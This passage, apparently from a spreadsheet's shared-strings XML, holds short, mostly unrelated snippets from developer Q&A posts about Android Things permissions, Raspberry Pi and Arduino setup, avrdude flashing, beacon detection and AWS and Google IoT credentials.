Then I have a using (I2cDevice device = await I2cDevice.FromIdAsync(dis[0].Id, settings)){...} which fails with the ArgumentOutOfRangeException mentionned before
A second way I tried was using this code:
I2CDevice device;
var settings = new I2cConnectionSettings(0x07);
settings.BusSpeed = I2cBusSpeed.StandardMode;
var controller = await Windows.Devices.I2c.I2cController.GetDefaultAsync();
device = controller.GetDevice(settings);
which produce a NullReferenceException with the last line</t>
  </si>
  <si>
    <t>Got this shiny manifest ready to be granted all ze permissions 
and yet when I boot up the raspberry pi it fails with this in the logcat
I searched high and low, stumbled upon multiple threads on StackOverflow 
Android Things permission com.google.android.things.permission.MANAGE_INPUT_DRIVERS not found
How to request permission on Android Things?</t>
  </si>
  <si>
    <t>Rebooting doesn't do anything, reinstalling doesn't do anything, the only way I found atm to give permissions is to manually grant them through adb like dis 
 adb shell pm grant exm.rand.lol com.google.android.things.permission.REBOOT
Running latest Preiew 6 of Android Things.</t>
  </si>
  <si>
    <t>Anyways if you need deterministic time deadlines you need to switch to a real-time patched kernel Real Time linux wiki homepage
I don't know if 5us is feasible, it depends on the system load, on the active drivers (e.g.</t>
  </si>
  <si>
    <t>Under my boards it doesn't show up, but it shows up under "Other Devices" as "ATmega16u2 DFU"
I've read online that the firmware needs to be updated, and I followed the instructions on the following link:
https://www.arduino.cc/en/Hacking/DFUProgramming8U2
The link to the latest firmware is broken.</t>
  </si>
  <si>
    <t>I am using raspberry pi for detecting beacons but many times I have observed there is inconsistent detection of beacons by raspberry pi.</t>
  </si>
  <si>
    <t>So, after reading documentation what I understand is following steps:
Upload CA root certificate:
Upload intermediate certificate in group enrollment configuration:
Use device's cert in Java code to provision.</t>
  </si>
  <si>
    <t>to get Raspbian kernel headers you should install  and have the latest firmware
on Raspberry follow those steps :
1 Perform an sudo rpi-update  you have to be on the latest firmware to do next  steps.</t>
  </si>
  <si>
    <t>This will put the Arduino into bootloader mode, and then bossac.exe will read ,erase , write and verify the device at that COM port but if your bootloader was modified and code was not uploaded within 5sec then the bootloader will lock itself and revert back to its previous state.</t>
  </si>
  <si>
    <t>Im using the raspberry pi and try to initiate Uart for Fona, an Adafruit library
But I get the following error
Here is my Manifest that I gave USE_PERIPHERAL_IO permissions
&lt;uses-permission android:name="android.permission.BLUETOOTH" /&gt;
&lt;uses-permission android:name="android.permission.BLUETOOTH_ADMIN" /&gt;
&lt;uses-permission android:name="android.permission.ACCESS_NETWORK_STATE" /&gt;
&lt;uses-permission android:name="android.permission.ACCESS_WIFI_STATE" /&gt;
&lt;uses-permission android:name="android.permission.CHANGE_WIFI_STATE" /&gt;
&lt;uses-permission android:name="android.permission.CHANGE_NETWORK_STATE" /&gt;
&lt;uses-permission android:name="android.permission.ACCESS_FINE_LOCATION" /&gt;
&lt;uses-permission android:name="com.google.android.things.permission.SET_TIME" /&gt;
&lt;uses-permission android:name="android.permission.WRITE_SETTINGS"
    tools:ignore="ProtectedPermissions" /&gt;
&lt;uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE" /&gt;
&lt;uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" /&gt;
&lt;uses-permission android:name="com.google.android.things.permission.USE_PERIPHERAL_IO" /&gt;
&lt;uses-permission android:name="android.permission.INTERNET"/&gt;
&lt;uses-feature android:name="android.hardware.bluetooth_le" /&gt;
&lt;application&gt;
    &lt;uses-library android:name="com.google.android.things" /&gt;
    &lt;activity
        android:name=".MainActivity"
        android:label="@string/app_name"&gt;
        &lt;intent-filter&gt;
            &lt;action android:name="android.intent.action.MAIN" /&gt;
            &lt;category android:name="android.intent.category.LAUNCHER" /&gt;
        &lt;/intent-filter&gt;
        &lt;!-- Start automatically after boot and re-start if the app is terminated.</t>
  </si>
  <si>
    <t>avrdude: Expected signature for ATtiny2313 is 1E 91 0A
and then the fuse bytes shown after verification, very strangely are all set to 0x00 : 
avrdude: safemode: Fuses OK (H:00, E:00, L:00)
i dont understand what the hell is happening and i have spent hours trying to figure out the probelm.</t>
  </si>
  <si>
    <t>Installing/upgrading
The easiest way to install the driver is to use :
Documentation
The Node.js MongoDB Driver Manual - All versions
3.0 Driver
Overview
Connecting
Authentication Guide
GridFS Guide
API Reference
2.2 Driver
Overview
Connecting
Authentication Guide
GridFS Guide
API Reference
Related links
node-mongodb-native source code on GitHub
mongoose-orm discussion on Google Groups
MongoDB server installation guides
M101JS: MongoDB for Node.js Developers</t>
  </si>
  <si>
    <t>keep your wiring for C:TX --&gt; A:RX and B:RX
for the other direction, combine the A+B TX data to one signal for the C:RX pin, by using a "half-duplex" wiring scheme with a diode and a resistor, as for example shown in Lammert Bies' circuit for Half duplex RS232 spy / monitor / sniffer cable or in this Spy Cable circuit.</t>
  </si>
  <si>
    <t>The most realistic solutions are:
you use an SSH server on the Android device an use it to communicate
if this is not enough because you need to monitor the input and other stuff you will code your own app
the other solutions are:
you root the phone
you recompile the kernel as modular
you write your own USB driver and load it into the new kernel
you still have to code your own app for managing the user input ...</t>
  </si>
  <si>
    <t>I am not sure if the Arduino bootloader allows you to read and write EEPROM through avrdude, but if not, you could write an initial Arduino sketch that writes the password to EEPROM, then later overwrite it with your actual sketch that only reads it.</t>
  </si>
  <si>
    <t>Some of beacons are not getting detect by raspberry pi and some of getting detected once but after some time it not at all getting detecting.</t>
  </si>
  <si>
    <t>You can of course verify
  or read from different portions of memory depending on your chip but
  Ill leave you to figure that out from the AVRdude manual.</t>
  </si>
  <si>
    <t>I have noticed that for me (someone not at all familiar with Rasp and Android Things) it is necessary to uninstall and reinstall, unplug and plug the thing and grant permissions sometimes several times for everything to work.</t>
  </si>
  <si>
    <t>Generally however the nature of an RTOS is such that it should not disallow I/O access in a user thread or process context - if I/O were restricted to some kernel privileged context you essentially loose control of the real-time performance and priority and the kernel cannot know what your applications priorities and real-time constraints are - that is what the real-time scheduler is for; to allow you to determine that.</t>
  </si>
  <si>
    <t>Struggling with authentication using FONA on either Raspberry Pi 2 and 3 even  while strictly following the Adafruit FONA setup instructions, the following steps helped me to get it work on both Pi's - based on a freshly installed raspbian/debian stretch OS.</t>
  </si>
  <si>
    <t>I have uploaded code thousands of times before (successfully) all of a sudden the IDE keeps giving the following message
avrdude: ser_open(): can't open device ".\COM3": Access is denied.</t>
  </si>
  <si>
    <t>Update : When the KeyStore file ( with certs ) is present inside the phone's mem location of this package, then the Android logs look like :
/CognitoCachingCredentia`enter code here`lsProvider: Loading credentials from SharedPreferences
I/AWS: Credentials provider output com.amazonaws.auth.CognitoCachingCredentialsProvider@2d7ae714
I/AmazonWebServiceClient: {execute-api, eu-central-1} was not found in region metadata, trying to construct an endpoint using the standard pattern for this region: 'execute-api.eu-central-1.amazonaws.com'.</t>
  </si>
  <si>
    <t>I put together a tutorial on how to use the Android Things to detect beacons on the Raspberry Pi 3.</t>
  </si>
  <si>
    <t>I know that I should use this instruction at connection time to broker:  
and to put the CA file on module i should use something like this:
enter image description here
that 's what i read from nodemcu website --&gt; https://nodemcu.readthedocs.io/en/master/en/modules/net/#netcertverify
but the problem is when i use this on my code the module doesn't understand it and gives error at upload time and runtime.</t>
  </si>
  <si>
    <t>When I run the code, if no face is detected, no video is playing but if the face is detected, the video turns on and off very seriously, the video does not appear, only black shadows come and go on the screen quickly.</t>
  </si>
  <si>
    <t>Simple provisioning process:
Thing built
Thing has a serial number
Thing registers itself via an internal server
The registration code running on the server could look something like this (JS + AWS JS SDK):
register-thing-template-body.json:
Make sure you got all the "NewDevice" Thing types, groups and policies in place.</t>
  </si>
  <si>
    <t>My self-given project has the following steps:
set ESP32 as a softAP - DONE
access ESP32 via WiFi - DONE
serve an HTML authentication form (index1.html)(that's inside the flash memory of the ESP32) asking for a nearby Wireless Network's SSID and Password - DONE
type the above mentioned credentials, click on a Log-In button and connect the ESP32 to that Wireless Network
switch to a different web page (index2.html)(that's inside the flash memory of the ESP32)
Hardware:
Board:  ESP32 DEVKIT1
Core Installation version:  1.0.1-git this one
IDE name:   Arduino IDE
Flash Frequency:    80Mhz
PSRAM enabled: no
Upload Speed:   115200
Computer OS: Linux Mint 19.1 Mate
Since I am a complete noob I've done a lot research but found nothing that I knew how to apply with my project, that's why I am writing this post.</t>
  </si>
  <si>
    <t>Use successfully retrieved credentials to sign the user in, or use the Credentials API to rapidly on-board new users by partially completing your app's sign in or sign up form.</t>
  </si>
  <si>
    <t>Creating individual feeds for each phisical device is the idea behind it, devices must be able to auto-register and activate a pre register feed, read the samples on Xively tutorial, this is not dificult at all, also serial numbers can be added/create in batches from text files.</t>
  </si>
  <si>
    <t>I'm new in this field of Android things I have Android Things OS image FLASHED for pico IMX7 and successfully booted up and everything is fine  until I ran a Github (https://github.com/dozingcat/CamTimer) program to verify the camera.</t>
  </si>
  <si>
    <t>The payloadlength read from the REG_FIFO register was not checked for valid value which led to reading the REG_FIFO register read for over 65000 times.</t>
  </si>
  <si>
    <t>credentials = ServiceAccountCredentials.from_json_keyfile_name(
    PRIVATE_KEY_JSON, scopes=API_SCOPES)
# Build the Cloud PubSub API object which you will be using for
# invoking the corresponding APIs using the credentials object
# you created previously
pubsub = discovery.build('pubsub', 'v1', credentials=credentials)
# List all topics the specified project
topics = pubsub.projects().topics().list(
    project=PROJECT).execute()
print topics
# Add a new topic
topic_name = 'TOPIC_NAME_TO_ADD'
added_topic_response = pubsub.projects().topics().create(
    name='{0}/topics/{1}'.format(PROJECT, topic_name), body={}).execute()
print added_topic_response
Using credentials from a service account within an App Engine app
There is some info here regarding how to use Service account credentials from your App Engine apps.</t>
  </si>
  <si>
    <t>I have created a thing in AWS IoT called RasberryPi and I am trying to register with its shadow using the following code :
I successfully connect but I never register.</t>
  </si>
  <si>
    <t>If AVRDUDE said the the flash was verified, then it is very likely that the specified hexfile was successfully loaded into flash memory on the chip.</t>
  </si>
  <si>
    <t>I am setting up a WSO2 iot installation to do auto enrollment for Android devices using official documentation I Found at ;
https://docs.wso2.com/display/IOTS331/Auto+Enrolling+an+Android+Device
all goes well until I get get to step number 11
I start the broker.sh and iot-server.sh
but when I try to login to  devicemgt I get this web page
An Error Occurred!</t>
  </si>
  <si>
    <t>From https://developer.android.com/things/sdk/pio/gpio:
Registering the callback:
Don't forget to add &lt;uses-permission android:name="com.google.android.things.permission.USE_PERIPHERAL_IO" /&gt; permission in the manifest.</t>
  </si>
  <si>
    <t>Is it possible to detect iBeacons on android-things devices (Raspberry Pi 3)?</t>
  </si>
  <si>
    <t>Ive successfully followed the "Alternate Build Method: The Old-Fashioned Debian Way" section of https://help.ubuntu.com/community/Kernel/Compile to recompile the kernel in order to expose GPIO access in user space and to turn on debug mode for GPIO: 
Once the new kernel was compiled, I was able to see the GPIO folder in /sys/class/gpio for the first time.</t>
  </si>
  <si>
    <t>For example, the Android WebRTC sample also requests permissions for audio access (among other things):
I might also recommend reviewing the Android Things video call sample, which showcases the native WebRTC SDK on Android Things instead of piping it all through WebView.</t>
  </si>
  <si>
    <t>This is from the Android Things docs https://developer.android.com/things/sdk/index.html
As you can see it says
All normal and dangerous permissions declared in your app's manifest are granted at install time.</t>
  </si>
  <si>
    <t>If the register I read with Wire.read() has values (signed) that are saved with the two's complement method, how can Wire.read() understand it?</t>
  </si>
  <si>
    <t>I got the message "No module named googlesamples.assistant.auth_helpers" so I followed the instructions given in answer to this question: No module named googlesamples.assistant.auth_helpers
The first 2 commands appear to complete OK, but the third command gives 
"google-oauthlib-tool: command not found"
My programming skills are too rusty to work out what's going wrong.</t>
  </si>
  <si>
    <t>[app-debug.apk] has prohibited permissions:
  android.permission.WRITE_SECURE_SETTINGS
  Error in Android Things Console
Does anybody know how to build my app as system app of android things or the solution to this problem?</t>
  </si>
  <si>
    <t>I have been desesperately trying to run the Ethernet &gt; DHCPAddressPrinter example on my Arduino uno mounted with an Ethernet Shield but to no effect, every time I run it it returns me the error
Failed to configure Ethernet using DHCP
I have tried all sorts of things, that are disabling the firewalls, resetting the board/shield, in start it gave me an ip but that was the only one time, i switched off the router and when i turned it on since then i cannot assign a MAC and IP to the Ethernet shield.</t>
  </si>
  <si>
    <t>2)
This is probably more of an OWA question than a linux one, can you get OWA to auto login with some supplied credentials and can you get it to auto show a shared calendar rather than me having to click "Calendar" then tick the shared calendar and untick the default one?</t>
  </si>
  <si>
    <t>Have I understood this correctly: if an AES encrypted string is sent 100 times and someone listens in on that encrypted message, the eavesdropper will get 100 diffrent encrypted strings since AES changes keys all the time?</t>
  </si>
  <si>
    <t>As a response we removed the USB cable that was connected from the PC uploading the firmware onto the Arduino Mega, (This was a stupid mistake)
After we restarted the IDE and tried again we recieved the following error during the upload.</t>
  </si>
  <si>
    <t>I would like to implement a REST API to let users register their own things and maintain the association with Customers and things, but I don't want the thing to require my Amazon credentials in order to push data.</t>
  </si>
  <si>
    <t>Notes:
Anything with {{ stuff }} is to be input by you
If the raspberry pi reboots google will overwrite the old ssh location with the new one
All the stuff that is beyond tmate is just to reestablish a connection in case of losing power or needing to reboot</t>
  </si>
  <si>
    <t>My bot needs to be able to log into a few websites (only one at a time) with cookies that uses a Captcha upon logging in (by saving a screenshot of the webpage and manually solving it), email verification and save the cookies so it does not need to log in manually each time.</t>
  </si>
  <si>
    <t>Finally, one clarification
Note: Android Things grants permissions at startup, so the Pi has been rebooted many times.</t>
  </si>
  <si>
    <t>Step 2: Find the IP of Raspberry Pi by a IP Scanner software or by accessing to the router (normally through address 192.168.1.1) 
Step 3: Access to Raspberry Pi with the IP through Putty
Step 4: Set the static IP for Raspberry Pi with this tutorial</t>
  </si>
  <si>
    <t>so here is the pseudocode:
about your implementation, somewhere i read that to play music, a service and a thread will be a better option.Read about services and threads in android documentation.</t>
  </si>
  <si>
    <t>I'm able to download the img from the site, write it into a MicroSD, boot (with correct screens: Resized partition, all the 'first boot' stuff like usename, wifi, etc), reboot for wifi, and login.</t>
  </si>
  <si>
    <t>After doing every kind of check, whenever I am trying to run the program on a Raspberry Pi3 running Android Things it keeps giving this error  
telling me that the private key file that I am supposed to use for the JWT doesn't exist despite the fact it does and I have given the path for the pem file.Here are my java codes  
The MqttExample.java  
package com.example.adityaprakash.test;
// [END cloudiotcore_mqtt_imports]
import org.eclipse.paho.client.mqttv3.MqttClient;
import org.eclipse.paho.client.mqttv3.MqttConnectOptions;
import org.eclipse.paho.client.mqttv3.MqttMessage;
import org.eclipse.paho.client.mqttv3.persist.MemoryPersistence;
import org.joda.time.DateTime;
import java.io.BufferedReader;
import java.io.FileReader;
import java.security.KeyFactory;
import java.security.spec.PKCS8EncodedKeySpec;
import android.util.Base64;
import io.jsonwebtoken.JwtBuilder;
import io.jsonwebtoken.Jwts;
import io.jsonwebtoken.SignatureAlgorithm;
public class MqttExample {
    // [START cloudiotcore_mqtt_createjwt]
    /** Create a Cloud IoT Core JWT for the given project id, signed with the given RSA key.</t>
  </si>
  <si>
    <t>The following code snippet shows an example of the above steps implemented in PCL project:
for authorization header we need a sasToken, so the following code snippet shows its implementation:
Note, that the above implementation doesn't handle a retrying mechanism in the step 2.</t>
  </si>
  <si>
    <t>I'd make either a single wifi network for all the cabinets (so only one set of credentials, or even an open one - without security) and then the app can connect to the raspberries using a sort of authentication (where the credentials are written in a QR code inside the cabinet) or a wifi network for each cabinet and its credentials are written in a QR code.</t>
  </si>
  <si>
    <t>For example, if you decide to you want to connect to the SSH service and a web server running inside your guest, you will need to start qemu with modified options like the following:
What this will do is route connections from port 22280 on your host (your MAC) to port 80 inside your qemu guest, (same for port 2222 --&gt; port 22 in the guest)
Which means you can browse to http://localhost:22280 on your Mac, to get to the web server in your virtual Raspberry Pi, etc.</t>
  </si>
  <si>
    <t>Probably the timing is too tight - the board needs some time to detect/ receive/ decode the beacon message.</t>
  </si>
  <si>
    <t>From the limited documentation, I'm assuming I do something like:
Register the replacement certificate (RegisterCertificate)
Find the existing thing (ListThings, filtered by attribute)
Attach the new certificate to the Thing (AttachThingPrincipal?)</t>
  </si>
  <si>
    <t>The system call code is as follows:
The system call was registered correctly in the kernel and I enabled  'cpu hotplug' feature during kernel configuration ( See picture )
Kernel configuration:
The kernel was build .</t>
  </si>
  <si>
    <t>Put an access point on a network segment that only has access to the videos you want to show, and give the Pi those credentials.</t>
  </si>
  <si>
    <t>The permissions granted have been done so manually, and are declared in the Manifest:
adb shell pm grant com.rpi.garagetinker android.permission.CAMERA
adb shell pm grant com.rpi.garagetinker android.permission.INTERNET
adb shell pm grant com.rpi.garagetinker android.permission.WRITE_EXTERNAL_STORAGE
&lt;uses-permission android:name="android.permission.CAMERA" /&gt;
&lt;uses-permission android:name="android.permission.INTERNET" /&gt;
&lt;uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" /&gt;
I have not dug into the errors on Chromium, but the logcat for Android Things RPi and Webview shows a permissions issue, which may be related to the problem (given the getUserMedia() error above):
12-31 18:00:07.491 772-772/?</t>
  </si>
  <si>
    <t>I was able to register the device eventually by using the Registration Tool Commands mentioned at https://developers.google.com/assistant/sdk/reference/device-registration/device-tool#register-device 
I did it after downloading the credentials file and authenticating it.</t>
  </si>
  <si>
    <t>NuGet servers are NuGet package repositories exposing a NuGet feed for consumption by a NuGet client and providing a way of securing and controlling access to the
  repository by means of an API-key, authentication and authorization.</t>
  </si>
  <si>
    <t>Nearby Messages is also used to detect beacons and retrieve messages associated with them via the Google Proximity API
Nearby Connections is a low-latency, socket-like API for sending of bi-directional data between Android devices on the same Wi-Fi network.</t>
  </si>
  <si>
    <t>I'm trying to ssh to my raspberry pi so I wanted to get the ip address as mentioned in the following link using 
http://learn.adafruit.com/adafruits-raspberry-pi-lesson-6-using-ssh/using-ssh-on-a-mac-or-linux
I did not get the list that starts with wlan0
I even tried typing sudo ifconfig wlan0 but I got the following error 
wlan0 error fetching interface information: Device not found
I'm connected through a wired cable and yes I'm connected to the internet since I can browse websites and for the moment I do not wanna set up any wireless connection I just want to be able to get my ip so I can login to the pi using the ip address 
is there anyway I can get my raspberry pi's ip address</t>
  </si>
  <si>
    <t>There is a server running on port 80 serving data but when I load it, I seem to get data like
File ot found
File not found
File not found
File not found
title&gt;04 NotFhund&lt;html File not found
File not found
File not found
&lt;html&gt; * File ot found/p&gt; title&gt;404 Not Fund
or it starts downloading similar stuff to above (I'm assuming the headers got corrupt like the actual content has)
If I don't use the SD card and I just serve pre-written web pages that are written into the sketch then as long as the SD card isn't in the slot, the pages show correctly.</t>
  </si>
  <si>
    <t>You need to continue to follow the instructions here: https://developer.android.com/things/hardware/raspberrypi.html
A Raspberry Pi will not connect to the Wifi if you have not first connected to an ethernet lan cable first.</t>
  </si>
  <si>
    <t>Keeping and comparing the state makes it an edge detector (state-change): 
detected = False
for detect_face in [90,90,90,110,110,110,90,90,90]:
    print(detect_face)
    if 80 &lt; detect_face &lt; 100:
        if detected:
            pass
        else:
            print(' 1')
            detected = True
    else:
        if detected:
            print(' 2')
            detected = False
        else:
            pass
(See its output above)
Note the symmetry of the conditions.</t>
  </si>
  <si>
    <t>But scp will ask you to give a password each time, that's why I recommend the folowing approach:
1) Generate a RSA keypair on your runtime machine: launch that on bash and follow instructions, it's up to you to decide if you use a passphrase:
You will now have .pub file where you decided to store the key.</t>
  </si>
  <si>
    <t>How do I design a policy that allows clients to read/write a Thing Shadow only if their certificate is attached to that Thing?</t>
  </si>
  <si>
    <t>For read and write access to users' contacts, use the People API,
  which provides both contact and profile information using JSON instead
  of the older GData protocol.</t>
  </si>
  <si>
    <t>What you should keep in mind is that BLE is not iBeacon, but all iBeacons are BLE (device with hardcoded manufacturer specific data, exposing RSSI, UUID, major and minor in broadcast BLE mode).</t>
  </si>
  <si>
    <t>On that window I want some portion will show the token no and counter no and other portion will show videos.</t>
  </si>
  <si>
    <t>For example:
Detecting active bluetooth devices;
Detecting Internet Connection;
Detecting available ports;
Detecting incoming voice;
Detecting color scheme;
Detecting features.</t>
  </si>
  <si>
    <t>Developers can create an API application to retrieve account information, toggle video settings, upload videos, update video metadata, and more.</t>
  </si>
  <si>
    <t>But every time the smartphone user go into the Raspberry Pi based wifi-zone, the user should select the wifi-hotspot at the network setting if he registered this wifi already, and the user should register the wifi-hotspot if this is the first time at the wifi-zone(cabinet).</t>
  </si>
  <si>
    <t>What I don't understand is how is this step performed (quote from mentioned article):
When a device attempts to connect with an X.509 certificate that is not known to AWS IoT but was signed by a CA that was registered with AWS IoT, the device certificate will be auto-registered by AWS IoT in a new PENDING_ACTIVATION state.</t>
  </si>
  <si>
    <t>However, there is no option to register the device model as instructed in Google Assistant SDK for Devices -&gt; 
https://developers.google.com/assistant/sdk/guides/library/python/embed/register-device 
As a result i am not able to execute the sample code.</t>
  </si>
  <si>
    <t>At this point the TSL handshake command (openssl s_client -connect) was giving verified OK so I decided to directly to not mention/link the Root-CA via SDK- but I had the authentication failure already at this point.</t>
  </si>
  <si>
    <t>It looks like the links in the Assistant SDK docs were modified, but it should be pointing to this page:
This will save the credentials at , which you can then copy into your project in order to authenticate the Google Assistant.</t>
  </si>
  <si>
    <t>I tried almost anything before write here, following the instruction on this site and similar ones:
http://www.tomshardware.co.uk/forum/24736-63-format-write-protected-micro-card
However, on Windows 7 the answer is always the same: "The disk is write protected".</t>
  </si>
  <si>
    <t>I followed the instructions on Pimoroni
I follow the instructions for  
Installing libcoap with support for DTLS
Following the instructions under 
API endpoints 
I copy and paste the code: 
Changing the IP address to the IP address of my IKEA tradfri gateway and the security key to the one on the gateway.</t>
  </si>
  <si>
    <t>To summerize things... Altough it's stated in Android Things readme that:
All normal and dangerous permissions declared in your app's manifest are granted at install time.</t>
  </si>
  <si>
    <t>AWS Certificate Manager removes the
  time-consuming manual process of purchasing, uploading, and renewing
  SSL/TLS certificates.</t>
  </si>
  <si>
    <t>My libnfc configuration file (/etc/nfc/libnfc.conf) is the following :
# Allow device auto-detection (default: true)
# Note: if this auto-detection is disabled, user has to set manually a device
# configuration using file or environment variable
allow_autoscan = true
# Allow intrusive auto-detection (dehttp://www.jamesrobertson.eu/pages/2014/mar/30/rfid-module.htmlfault: false)
# Warning: intrusive auto-detection can seriously disturb other devices
# This option is not recommended, user should prefer to add manually his device.</t>
  </si>
  <si>
    <t>Is there any API available for auto discovery of greengrass core (i.e API for activating "Automatically detect and override connection information" under greengrass group setting)?</t>
  </si>
  <si>
    <t>I have the following examples of how to implement this process in Java from the below resources:
Read data from an Adafruit Trinket over USB
Usb4java examples
Issue:
I can successfully do:
List all devices
Choose my device according to the Vendor ID &amp; Product ID
Open device
Detaching kernel driver
Claiming the device
And when the time comes to read the device data that the scanner sent, I always get a timeout error (-7).</t>
  </si>
  <si>
    <t>I am working with Bluemix tutorial recipe "Real Time Data Analysis Using IBM Watson IoT Platform Analytics" presented here:
    https://developer.ibm.com/recipes/tutorials/real-time-data-analysis-using-ibm-watson-iot-platform-analytics
I am not seeing the behavior in my Watson IoT dashboard as described; the phone device does connect and register itself but I see no events or data.</t>
  </si>
  <si>
    <t>Even though in the permissions list shown on the console it says:
android.permission.INTERNET
com.google.android.things.permission.USE_PERIPHERAL_IO
I still get the error showing in logcat:
 java.lang.SecurityException: Caller lacks required permission com.google.android.things.permission.USE_PERIPHERAL_IO
?</t>
  </si>
  <si>
    <t>I can ascertain that both ways can successfully flash the firmware onto the chip.</t>
  </si>
  <si>
    <t>AWS Certificate Manager removes the time-consuming manual process of purchasing, uploading, and renewing SSL/TLS certificates.</t>
  </si>
  <si>
    <t>Disabled IPv6 on my PC (pings were showing IPv6 when pinging the host name)
Things I have noticed:
When I first was able to get this to work, I saw that the instructions on MSDN are showing "Universal" for Authentication - When I select from the list of available Pi3, it moves it back to 'None' at one point, I was able to deploy and debug with 'None', but now even now that does not work.</t>
  </si>
  <si>
    <t>Executing PyBeacon -i 321654987654321a321654a456b54699 command, for example, and using the Google App called "Beacon Tools" to register the Eddystone-UID beacon (ok detected into unregistered layer), when i try to register, the app tell me "failed to connect".</t>
  </si>
  <si>
    <t>The problem:
Through an Android app, be able to programmatically verify arduino flash contents to ensure it has not been changed (maliciously)
I am able to do that with avrdude using the command as below in the android adb shell
This works well with arduino, but the problem comes in when I want to do the same with a board that uses an FTDI chip.</t>
  </si>
  <si>
    <t>Power Supply - I recommended 5V 2A Power Supply 2) And Network ethernet patch cable shielded (with shield or ground line).</t>
  </si>
  <si>
    <t>Your second approach uses a kernel properly patched to run on the versatile board (supported by QEMU), so that is good, but the kernel 3.x is too old for a modern Raspbian.</t>
  </si>
  <si>
    <t>Try this:
You'll probably want to write a bad set of credentials to flash before you update your code to tell the SDK to stop saving them, otherwise I think it will keep using the last saved set.</t>
  </si>
  <si>
    <t>https://a1pn10j0v8htvw.iot.us-east-1.amazonaws.com:8443/topics/iotbutton/virtualButton?qos=1)
Authorisation Type: AWS Signature
AccessKey / SecretKey: As per your credentials
AWS Region: Region you AWS IoT instances is in
Service Name: iotdata
Session Token: Leave blank</t>
  </si>
  <si>
    <t>https://developer.android.com/about/versions/marshmallow/android-6.0-changes.html
Also android.permission.BLUETOOTH_ADMIN, android.permission.BLUETOOTH
I have checked, ACCESS_FINE_LOCATION or ACCESS_COARSE_LOCATION over Android &gt;=6.0 needs runtime permission but it give an error due Android Things limitation.</t>
  </si>
  <si>
    <t>I'm not sure why you're not able to login but I would suggest using the Deluge client instead of the WebUI as it has more features - you can get it from here
You can find a good step-by-step tutorial of how to use Deluge with a client here
In the meantime I might be inclined to start from scratch with a fresh Wheezy install instead of wasting too much time on it..</t>
  </si>
  <si>
    <t>The problem is that whilst the application runs fine as a .jar when I try to run as an IMLet I get the following error during build:
Here is a small snippet of the code running the Broker:
BrokerService broker = new BrokerService();
I've read the documentation on API permissions and don't fully understand it so I understand if could be a problem with this, so any help here would also be appreciated.</t>
  </si>
  <si>
    <t>The application uses wx for a GUI and has been given the following permissions:
When I load the application from the terminal like so:
The application loads and causes no errors.</t>
  </si>
  <si>
    <t>I have used the raspberry pi to detect the ibeacons and gone through the tutorial provided by Radius Networks here.</t>
  </si>
  <si>
    <t>Among the other code they've flashed to the chip, would they have programmed in the 'authentication' code mentioned earlier?</t>
  </si>
  <si>
    <t>I could run NodeMCU-PyFlasher-1.0.0.exe and flash firmware onto nodeMCU boards (WeMos D1 mini or NodeMCU boards).</t>
  </si>
  <si>
    <t>With default settings, the Android Beacon Library considers a region as having been exited if no beacons matching the region have been detected in 10 seconds.</t>
  </si>
  <si>
    <t>I use :
There's a menu that comes up wherein you select Boot Options then something along the lines of B1 Boot Desktop Options and finally you select among several auto login options.</t>
  </si>
  <si>
    <t>Then you should clear your cached credentials on your user profile, open a command prompt and type in:
As you can see in the following picture, you should delete everything with minwinpc, or the device's hostname/ip address
Next you need to create a new, dummy c# iot project using one of the templates downloaded from Visual Studio Marketplace
Now Right Click the project and choose properties
Enter the debug information as shown below.</t>
  </si>
  <si>
    <t>After entering the Correct values for the storage-alias, private key and certificate it gives me the following exception :
Following the other steps (in documentation) and trying to connect it gives the following exception in kura console :
Solutions I have tried:
The broker url has the port 8883 and an mqtts protocol
the value Lwt.retain is set to false
the value for storage-alias and topic.context.account-name is same.</t>
  </si>
  <si>
    <t>Here is a picture of my environment variable: https://gyazo.com/47d1640c681ebb2a87a216c71817f9e9
And here is a picture of the permissions I have given to the lambda function:
https://gyazo.com/ca7082a8580904cf77b32e3f0ca07518
I cant seem to understand why there would be a permission error or a time out error as I have also increased the timeout on the function.</t>
  </si>
  <si>
    <t>I have been looking at Skype4py python script and want to send the instant messaging with the help of ESP32 to my skype ID one of the simple example is as mentioned below 
But I need to know will it be using the credentials which are already mentioned in Skype software or any other way through which we can also mention credentials and make it work?</t>
  </si>
  <si>
    <t>I compile a kernel module for it as follows:
and, after , I observe the following in /var/log/kern.log:
PMCR = 41072000
PMUSERENR = 0
PMUSERENR = 1
PMCCNTR = 0
When I try to read PMCCNTR from user-mode, I get illegal instruction, even after PMUSERENR has been set to 1.</t>
  </si>
  <si>
    <t>Connecting over wifi works flawlessly each time, however I need to demo projects in class and the campus wifi does not play well with SSH, our professor stated that we must use an Ethernet connection.</t>
  </si>
  <si>
    <t>It permits much more than just browsing, files can be opened and read or written, permissions changed, file times modified, attributes and ACL's can be manipulated, and so on.</t>
  </si>
  <si>
    <t>Looking at these tutorials:
raspberrypi.org/documentation/configuration/wireless/access-point.md (this is how I set up the access point)
pimylifeup.com/raspberry-pi-captive-portal/ (for captive portal using nodogsplash)
So the access point is working but honestly I have no clue about how the captive portal works with this.</t>
  </si>
  <si>
    <t>In particulary, i followed this link : https://delog.wordpress.com/2014/10/10/wireless-on-raspberry-pi-with-buildroot/
and verify my linux kernel wireless options are activated, but no results.</t>
  </si>
  <si>
    <t>From these, one locks for reading (multiple threads can access, none can modify) and another for write access (only one thread can access and also modify at time).</t>
  </si>
  <si>
    <t>While trying to set the credentials for the application defining a variable in the Terminal (following the steps shown here: https://cloud.google.com/speech-to-text/docs/reference/libraries#client-libraries-usage-python) I get the following error:
As that didn't work, I tried to set the credentials manually inside the code.</t>
  </si>
  <si>
    <t>Flashing software
To upload your firmware to ATTiny85 chip, you can use AVRDude program.</t>
  </si>
  <si>
    <t>NOTE: Before you start using Upwork API, you need to register your application to obtain your client credentials (a.k.a API key and secret).</t>
  </si>
  <si>
    <t>I was able to create a Enrollment Group and enroll a device to that following these document
test X509 certificate creation and Simulate a device by giving the idscope of the device
And right now I have a device registered in Group enrollment and linked to my IOT hub.</t>
  </si>
  <si>
    <t>So you should probably use the following options:
However, this is still completely insecure:
I wanted to use ssmtp today too, but noticed that it does NOT verify the SSL/TLS certificate of the remote server on the current debian &amp; ubuntu releases and also does NOT verify the hostname of the certificate.</t>
  </si>
  <si>
    <t>Trying to write a one-line BLE tag presence detector for Home Assistant (build-in BLE module on RPI-3 slows Home Assistant significantly).</t>
  </si>
  <si>
    <t>Specifically it states:
Certificates can be retrieved at any time
